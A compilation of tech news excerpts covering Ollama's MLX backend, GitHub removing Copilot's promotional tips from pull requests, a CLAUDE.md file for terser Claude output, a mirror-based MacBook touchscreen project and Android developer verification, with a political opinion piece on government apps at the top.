The federal government publishes content available through standard web protocols and RSS feeds, then wraps that content in applications that demand access to your location, biometrics, storage, contacts, and device identity. They embed advertising trackers in FBI apps. They sell the line that you need their app to receive their propaganda while the app quietly collects data that flows into the same surveillance pipeline feeding ICE raids and warrantless location tracking. Every single one of these apps could be replaced by a web page, and they know that. The app exists because a web page can’t read your fingerprint, track your GPS in the background, or inventory the other accounts on your device.
You don’t need their app. You don’t need their permission to access public information. You already have a browser, an RSS reader, and the ability to decide for yourself what runs on your own hardware. Use them.
...
Read the original on www.sambent.com »
Today, we’re previewing the fastest way to run Ollama on Apple silicon, powered by MLX, Apple’s machine learning framework.
This unlocks new performance to accelerate your most demanding work on macOS:
* Coding agents like Claude Code, OpenCode, or Codex
Ollama on Apple silicon is now built on top of Apple’s machine learning framework, MLX, to take advantage of its unified memory architecture.
This results in a large speedup of Ollama on all Apple Silicon devices. On Apple’s M5, M5 Pro and M5 Max chips, Ollama leverages the new GPU Neural Accelerators to accelerate both time to first token (TTFT) and generation speed (tokens per second).
Testing was conducted on March 29, 2026, using Alibaba’s Qwen3.5-35B-A3B model: the new MLX backend running an `NVFP4` quantization was compared against Ollama’s previous implementation (Ollama 0.18) running a `Q4_K_M` quantization. Ollama 0.19 will see even higher performance (1851 token/s prefill and 134 token/s decode when running with `int4`).
Ollama now leverages NVIDIA’s NVFP4 format to maintain model accuracy while reducing memory bandwidth and storage requirements for inference workloads.
As more inference providers scale inference using the NVFP4 format, Ollama users get the same numerical results they would see in a production environment.
It also enables Ollama to run models optimized with NVIDIA’s Model Optimizer. Other precisions will be made available based on the design and usage intent of Ollama’s research and hardware partners.
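For intuition, NVFP4 is (roughly) a block-scaled 4-bit floating-point format: E2M1 values in groups of 16, each group sharing a scale (FP8 in hardware). The sketch below is not Ollama’s or NVIDIA’s implementation - it keeps scales in full precision - but it shows why the format cuts memory bandwidth while staying close to the original values:

```python
import numpy as np

# E2M1 (FP4) representable magnitudes. Real NVFP4 pairs each
# 16-value block with an FP8 scale; this sketch keeps scales in
# full precision to show the structure only.
FP4_GRID = np.array([0.0, 0.5, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0])

def quantize_fp4_blocks(x, block=16):
    """Quantize a flat array to block-scaled FP4: one scale per
    `block` values, each value snapped to the nearest FP4 grid point."""
    x = np.asarray(x, dtype=np.float64).reshape(-1, block)
    scale = np.abs(x).max(axis=1, keepdims=True) / FP4_GRID[-1]
    scale[scale == 0] = 1.0            # avoid dividing by zero
    scaled = x / scale
    # nearest grid magnitude, sign restored afterwards
    idx = np.abs(np.abs(scaled)[..., None] - FP4_GRID).argmin(axis=-1)
    q = np.sign(scaled) * FP4_GRID[idx]
    return q, scale

def dequantize_fp4_blocks(q, scale):
    return (q * scale).reshape(-1)
```

Each block of 16 weights costs 16 × 4 bits plus one scale, versus 16 × 16 bits at half precision - the memory-bandwidth saving the post refers to.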
Ollama’s cache has been upgraded to make coding and agentic tasks more efficient.
* Lower memory utilization: Ollama will now reuse its cache across conversations, meaning lower memory utilization and more cache hits when branching conversations that share a system prompt, as tools like Claude Code do.
* Intelligent checkpoints: Ollama will now store snapshots of its cache at intelligent locations in the prompt, resulting in less prompt processing and faster responses.
* Smarter eviction: shared prefixes survive longer even when older branches are dropped.
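The post doesn’t detail the implementation, but conceptually this kind of prefix reuse amounts to checkpointing the KV cache at prompt prefixes and restoring the longest checkpoint that matches a new prompt. A toy sketch (names and structure are illustrative, not Ollama’s code):

```python
class PrefixCache:
    """Illustrative sketch of prefix-style KV-cache reuse.
    Checkpoints are keyed by token prefixes; a new prompt restores
    the longest checkpointed prefix, so only the remaining suffix
    needs prompt processing."""

    def __init__(self):
        self.checkpoints = {}  # tuple(tokens) -> opaque KV snapshot

    def save(self, tokens, snapshot):
        """Record a KV snapshot at this point in the prompt."""
        self.checkpoints[tuple(tokens)] = snapshot

    def longest_prefix(self, tokens):
        """Return (matched_len, snapshot) for the longest saved
        checkpoint that is a prefix of `tokens`."""
        best, snap = 0, None
        for pfx, s in self.checkpoints.items():
            n = len(pfx)
            if n > best and tuple(tokens[:n]) == pfx:
                best, snap = n, s
        return best, snap
```

Branching from a shared system prompt then hits the same checkpoint, which is why memory use drops and responses start faster.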
This preview release of Ollama accelerates the new Qwen3.5-35B-A3B model, with sampling parameters tuned for coding tasks.
Please make sure you have a Mac with more than 32GB of unified memory.
ollama launch claude --model qwen3.5:35b-a3b-coding-nvfp4
ollama launch openclaw --model qwen3.5:35b-a3b-coding-nvfp4
ollama run qwen3.5:35b-a3b-coding-nvfp4
We are actively working to support future models. For users with custom models fine-tuned on supported architectures, we will introduce an easier way to import models into Ollama. In the meantime, we will expand the list of supported architectures.
Thank you to:
* The MLX contributor team who built an incredible acceleration framework
* The GGML & llama.cpp team who built a thriving local framework and community
* The Alibaba Qwen team for open-sourcing excellent models and their collaboration
...
Read the original on ollama.com »
Updated Microsoft has done a 180. Following backlash from developers, GitHub has removed Copilot’s ability to stick ads - what it calls “tips” - into any pull request that invokes its name.
Australian developer Zach Manson noted on Monday that, after a coworker asked Copilot to correct a typo in one of his pull requests, he was surprised to find a message from Copilot in the PR pushing readers to adopt productivity app Raycast.
“Quickly spin up Copilot coding agents from anywhere on your macOS or Windows machine with Raycast,” the note read with a lightning bolt emoji and link to install Raycast.
“Initially I thought there was some kind of training data poisoning or novel prompt injection and the Raycast team was doing some elaborate proof of concept marketing,” Manson told The Register in an email.
But no: Take a look around GitHub and you’ll see more than 11,400 PRs with the same tip in them, all seemingly added by Copilot. Take a look at the PRs’ code itself and search for the block invoking Copilot to add a tip and you’ll find plenty more examples of different tips being inserted by Copilot.
Manson told us that he’s not surprised to see GitHub doing this with an AI model, but he said it’s pretty offensive to see the Raycast ad inserted by Copilot into his own PR like he wrote it.
“I wasn’t even aware that the GitHub Copilot Review integration had the ability to edit other users’ descriptions and comments,” Manson told us. “I can’t think of a valid use case for that ability.”
It was only Monday morning when Microsoft watchers at Neowin picked up Manson’s report that Copilot was injecting what developers saw as ads into PRs, and, by the afternoon, GitHub had decided a recent change to Copilot may have gone a bit too far.
GitHub VP of developer relations Martin Woodward explained in a post on X later in the day Monday that Copilot inserting ads into PRs isn’t actually new behavior - it’s been doing so in the ones it creates for a while. Letting Copilot touch PRs it didn’t create, but is mentioned in, on the other hand, is new behavior that hasn’t really worked out.
“[When] we added the ability to have Copilot work on any PR by mentioning it the behaviour became icky,” Woodward said.
Tim Rogers, principal product manager for Copilot at GitHub, took to Hacker News on Monday to say that giving Copilot the ability to add “tips” to PRs was intended “to help developers learn new ways to use the agent in their workflow.”
Hearing feedback from the community following Manson’s post and the kerfuffle it generated, Rogers said, has helped him realize that “on reflection,” letting Copilot make changes to PRs written by a human without their knowledge “was the wrong judgement call.”
“We’ve now disabled these tips in pull requests created by or touched by Copilot, so you won’t see this happen again,” Rogers added. ®
Martin Woodward, VP of Developer Relations, GitHub, said in a statement: “GitHub does not and does not plan to include advertisements in GitHub. We identified a programming logic issue with a GitHub Copilot coding agent tip that surfaced in the wrong context within a pull request comment. We have removed agent tips from pull request comments moving forward.”
...
Read the original on www.theregister.com »
One file. Drop it in your project. Cuts Claude output verbosity by ~63%. No code changes required.
Note: most Claude costs come from input tokens, not output. This file targets output behavior - sycophancy, verbosity, formatting noise. It won’t fix your biggest bill, but it will fix your most annoying responses.
Model support: benchmarks were run on Claude only. The rules are model-agnostic and should work on any model that reads context - but results on local models like llama.cpp, Mistral, or others are untested. Community results welcome.
When you use Claude Code, every word Claude generates costs tokens. Most people never control how Claude responds - they just get whatever the model decides to output. By default, Claude:
* Opens every response with “Sure!”, “Great question!”, “Absolutely!”
* Ends with “I hope this helps! Let me know if you need anything!”
* Restates your question before answering it
* Adds unsolicited suggestions beyond what you asked
* Over-engineers code with abstractions you never requested
All of this wastes tokens. None of it adds value.
Drop CLAUDE.md into your project root. Claude Code reads it automatically. Behavior changes immediately.
This file works best for:
* Repeated structured tasks where Claude’s default verbosity compounds across hundreds of calls
* Teams who need consistent, parseable output format across sessions
This file is not worth it for:
* Single short queries - the file loads into context on every message, so on low-output exchanges it is a net token increase
* Casual one-off use - the overhead doesn’t pay off at low volume
* Fixing deep failure modes like hallucinated implementations or architectural drift - those require hooks, gates, and mechanical enforcement
* Pipelines using multiple fresh sessions per task - fresh sessions don’t carry the CLAUDE.md overhead benefit the same way persistent sessions do
* Parser reliability at scale - if you need guaranteed parseable output, use structured outputs (JSON mode, tool use with schemas) built into the API - that is a more robust solution than prompt-based formatting rules
* Exploratory or architectural work where debate, pushback, and alternatives are the point - the override rule lets you ask for that any time, but if that’s your primary workflow this file will feel restrictive
The honest trade-off:
The CLAUDE.md file itself consumes input tokens on every message. The savings come from reduced output tokens. The net is only positive when output volume is high enough to offset the persistent input cost. At low usage it costs more than it saves.
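That trade-off is easy to sanity-check with arithmetic. A rough model (all numbers illustrative, including the ~63% reduction figure; real billing also prices input and output tokens differently, so a cost model would weight the two terms):

```python
def net_tokens_saved(file_tokens, messages, avg_output_tokens,
                     reduction=0.63):
    """Net tokens saved over a session.  The CLAUDE.md file is
    re-sent as input with every message; the payoff is the fraction
    of output it trims.  Returns positive when the file pays for
    itself, negative when it costs more than it saves."""
    saved = messages * avg_output_tokens * reduction
    overhead = messages * file_tokens
    return saved - overhead
```

Both terms scale with message count, so the sign depends on per-message output: the file pays for itself only when `avg_output_tokens * reduction` exceeds the file’s own token size - exactly the “low-output exchanges are a net token increase” caveat above.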
Same 5 prompts. Run without CLAUDE.md (baseline) then with CLAUDE.md (optimized).
~295 words saved per 4 prompts. Same information. Zero signal loss.
Methodology note: This is a 5-prompt directional indicator (T1-T3, T5 for word reduction; T4 is a format test), not a statistically controlled study. Claude’s output length varies naturally between identical prompts. No variance controls or repeated runs were applied. Treat the 63% as a directional signal for output-heavy use cases, not a precise universal measurement. The CLAUDE.md file itself adds input tokens on every message - net savings only apply when output volume is high enough to offset that persistent cost.
Scope rules to your actual failure modes, not generic ones.
Generic rules like “be concise” help but the real wins come from targeting specific failures you’ve actually hit. For example if Claude silently swallows errors in your pipeline, add a rule like: “when a step fails, stop immediately and report the full error with traceback before attempting any fix.” Specific beats generic every time.
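For instance, a CLAUDE.md targeting those failure modes might contain (the rules below are illustrative examples assembled from this page’s suggestions, not the repo’s actual file):

```markdown
# Output rules
- No greetings, no sign-offs, no restating the question.
- Answer first; add caveats only if they change the answer.

# Project-specific failure modes
- When a pipeline step fails, stop immediately and report the full
  error with traceback before attempting any fix.
- Never modify /config without explicit confirmation.
```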
CLAUDE.md files compose - use that.
Claude reads multiple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), project-level, and subdirectory-level. This means:
* Keep general preferences (tone, format, ASCII rules) in your global file
* Keep project-specific constraints (“never modify /config without confirmation”) at the project level
This avoids bloating any single file and keeps rules close to where they apply.
Different project types need different levels of compression. Pick the base file + a profile, or use the base alone.
Option 1 - Download the base file:
curl -o CLAUDE.md https://raw.githubusercontent.com/drona23/claude-token-efficient/main/CLAUDE.md
Option 2 - Clone and copy a profile:
git clone https://github.com/drona23/claude-token-efficient
cp claude-token-efficient/profiles/CLAUDE.coding.md your-project/CLAUDE.md
Option 3 - Manual:
Copy the contents of CLAUDE.md from this repo into your project root.
User instructions always win. If you explicitly ask for a detailed explanation or verbose output, Claude will follow your instruction - the file never fights you.
Found a behavior that CLAUDE.md can fix? Open an issue with:
* The annoying behavior (what Claude does by default)
* The prompt that triggers it
Community submissions become part of the next version with full credit.
This project was built on real complaints from the Claude community. Full credit to every source that contributed a fix:
MIT - free to use, modify, and distribute.
Built by Drona Gangarapu - open to PRs, issues, and profile contributions.
...
Read the original on github.com »
We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin, Guillermo, and Logan in about 16 hours.
The basic principle behind Sistine is simple. Surfaces viewed from an angle tend to look shiny, and you can tell if a finger is touching the surface by checking if it’s touching its own reflection.
Kevin, back in middle school, noticed this phenomenon and built ShinyTouch, utilizing an external webcam to build a touch input system requiring virtually no setup. We wanted to see if we could miniaturize the idea and make it work without an external webcam. Our idea was to retrofit a small mirror in front of a MacBook’s built-in webcam, so that the webcam would be looking down at the computer screen at a sharp angle. The camera would be able to see fingers hovering over or touching the screen, and we’d be able to translate the video feed into touch events using computer vision.
Our hardware setup was simple. All we needed was to position a mirror at the appropriate angle in front of the webcam. Here is our bill of materials:
After some iteration, we settled on a design that could be assembled in minutes using a knife and a hot glue gun.
The first step in processing video frames is detecting the finger. Here’s a typical example of what the webcam sees:
The finger detection algorithm needs to find the touch/hover point for further processing. Our current approach uses classical computer vision techniques. The processing pipeline consists of the following steps:
1. Find the two largest contours and ensure that the contours overlap in the horizontal direction and the smaller one is above the larger one.
2. Identify the touch/hover point as the midpoint of the line connecting the top of the bottom contour and the bottom of the top contour.
3. Distinguish between touch and hover based on the vertical distance between the two contours.
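Those steps can be sketched in a few lines of Python. In the real pipeline OpenCV (e.g. findContours/boundingRect) would supply the contours from the thresholded webcam frame; the bounding boxes and pixel threshold below are illustrative:

```python
def pair_finger_and_reflection(boxes, touch_threshold=8):
    """Decide whether the two largest contours look like a finger and
    its reflection, and locate the touch/hover point.  Boxes are
    (x, y, w, h) in image coordinates (y grows downward); the pixel
    threshold is an illustrative value, not the project's."""
    top, bottom = sorted(boxes, key=lambda b: b[1])
    # the smaller contour must sit above the larger one
    if top[2] * top[3] > bottom[2] * bottom[3]:
        return None
    # the two contours must overlap horizontally
    if top[0] + top[2] < bottom[0] or bottom[0] + bottom[2] < top[0]:
        return None
    finger_bottom = top[1] + top[3]     # bottom edge of upper contour
    reflection_top = bottom[1]          # top edge of lower contour
    point = ((top[0] + top[2] / 2 + bottom[0] + bottom[2] / 2) / 2,
             (finger_bottom + reflection_top) / 2)
    gap = reflection_top - finger_bottom
    return point, ("touch" if gap <= touch_threshold else "hover")
```

A small vertical gap means the finger has met its reflection at the glass; a large gap means it is hovering above the screen.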
Shown above is the result of applying this process to a frame from the webcam. The finger and reflection (contours) are outlined in green, the bounding box is shown in red, and the touch point is shown in magenta.
The final step in processing the input is mapping the touch/hover point from webcam coordinates to on-screen coordinates. The two are related by a homography. We compute the homography matrix through a calibration process where the user is prompted to touch specific points on the screen. After we collect data matching webcam coordinates with on-screen coordinates, we can estimate the homography robustly using RANSAC. This gives us a projection matrix that maps webcam coordinates to on-screen coordinates.
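As a sketch of that mapping: the calibration pairs feed a Direct Linear Transform, which the project then makes robust with RANSAC (e.g. via OpenCV’s findHomography). This minimal least-squares version assumes clean correspondences:

```python
import numpy as np

def estimate_homography(src, dst):
    """Least-squares Direct Linear Transform from >= 4 point
    correspondences (webcam -> screen).  Each pair contributes two
    rows of the homogeneous system A h = 0; the solution is the
    right singular vector for the smallest singular value."""
    rows = []
    for (x, y), (u, v) in zip(src, dst):
        rows.append([x, y, 1, 0, 0, 0, -u * x, -u * y, -u])
        rows.append([0, 0, 0, x, y, 1, -v * x, -v * y, -v])
    _, _, vt = np.linalg.svd(np.array(rows, dtype=float))
    H = vt[-1].reshape(3, 3)
    return H / H[2, 2]   # fix the overall scale (and sign)

def project(H, point):
    """Map a webcam-coordinate touch point to screen coordinates."""
    u, v, w = H @ np.array([point[0], point[1], 1.0])
    return (u / w, v / w)
```

Once H is estimated, every detected touch point passes through `project` before being turned into a mouse event.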
The video above demonstrates the calibration process, where the user has to follow a green dot around the screen. The video includes some debug information, overlaid on live video from the webcam. The touch point in webcam coordinates is shown in magenta. After the calibration process is complete, the projection matrix is visualized with red lines, and the software switches to a mode where the estimated touch point is shown as a blue dot.
In the current prototype, we translate hover and touch into mouse events, making existing applications instantly touch-enabled.
If we were writing our own touch-enabled apps, we could directly make use of touch data, including information such as hover height.
Project Sistine is a proof-of-concept that turns a laptop into a touchscreen using only $1 of hardware, and for a prototype, it works pretty well! With some simple modifications such as a higher resolution webcam (ours was 480p) and a curved mirror that allows the webcam to capture the entire screen, Sistine could become a practical low-cost touchscreen system.
Our Sistine prototype is open source, released under the MIT License.
...
Read the original on anishathalye.com »
The latest Android and Google Play news for app and game
developers.
Android developer verification: Rolling out to all developers on Play Console and Android Developer Console
Android is for everyone. It’s built on a commitment to an open and safe platform. Users should feel confident installing apps, no matter where they get them from. However, our recent analysis found over 90 times more malware from sideloaded sources than on Google Play. So as an extra layer of security, we are rolling out Android developer verification to help prevent malicious actors from hiding behind anonymity to repeatedly spread harm. Over the past several months, we’ve worked closely with the community to improve the design, accounting for the many ways people use Android while balancing openness with safety.
Today, we’re starting to roll out Android developer verification to all developers in both the new Android Developer Console and Play Console. This allows you to complete your verification and register your apps before user-facing changes begin later this year.
If you only distribute apps outside of Google Play, you can create an account in Android Developer Console today.
If you’re on Google Play, check your Play Console account for updates over the next few weeks. If you’ve already verified your identity here, then you’re likely already set.
Most of your users’ download experience will not change at all
While verification tools are rolling out now, the experience for users downloading your apps will not change until later this year. The user-side protections will first go live in Brazil, Indonesia, Singapore, and Thailand this September, before expanding globally in 2027. We’ve shared this timeline early to ensure you have ample time to complete your verification.
Following this deadline, for the vast majority of users, the experience of installing apps will stay exactly the same. Only when a user tries to install an unregistered app will they need to use ADB or the advanced flow, helping us keep the broader community safe while preserving flexibility for our power users.
Developers can still choose where to distribute their apps. Most users’ download experience will not change
Tailoring the verification experience to your feedback
To balance the need for safety with our commitment to openness, we’ve improved the verification experience based on your feedback. We’ve streamlined the developer experience to be more integrated with existing workflows and maintained choice for power users.
For Android Studio developers: In the next two months, you’ll see your app’s registration status right in Android Studio when you generate a signed App Bundle or APK.
You’ll see your app’s registration status in Android Studio when you generate a signed App Bundle or APK.
For Play developers: If you’ve completed Play Console’s developer verification requirements, your identity is already verified and we’ll automatically register eligible Play apps for you. In the rare case that we are unable to register your apps for you, you will need to follow the manual app claim process. Over the next couple of weeks, more details will be provided in the Play Console and through email. Also, you’ll be able to register apps you distribute outside of Play in the Play Console too.
The Android developer verification page in your Play Console will show the registration status for each of your apps.
For students and hobbyists: To keep Android accessible to everyone, we’re building a free, no government ID required, limited distribution account so you can share your work with up to 20 devices. You only need an email account to get started. Sign up for early access. We’ll send invites in June.
For power users: We are maintaining the choice to install apps from any source. You can use the new advanced flow for sideloading unregistered apps or continue using ADB. This maintains choice while protecting vulnerable users.
We’re rolling this out carefully and working closely with developers, users, and our partners. In April, we’ll introduce Android Developer Verifier, a new Google system service that will be used to check if an app is registered to a verified developer.
April 2026: Users will start to see Android Developer Verifier in their Google system services settings.
September 30, 2026: Apps must be registered by verified developers in order to be installed and updated on certified Android devices in Brazil, Indonesia, Singapore, and Thailand. Unregistered apps can be sideloaded with ADB or advanced flow.
2027 and beyond: We will roll out this requirement globally.
We’re committed to an Android that is both open and safe. Check out our developer guides to get started today.
...
Read the original on android-developers.googleblog.com »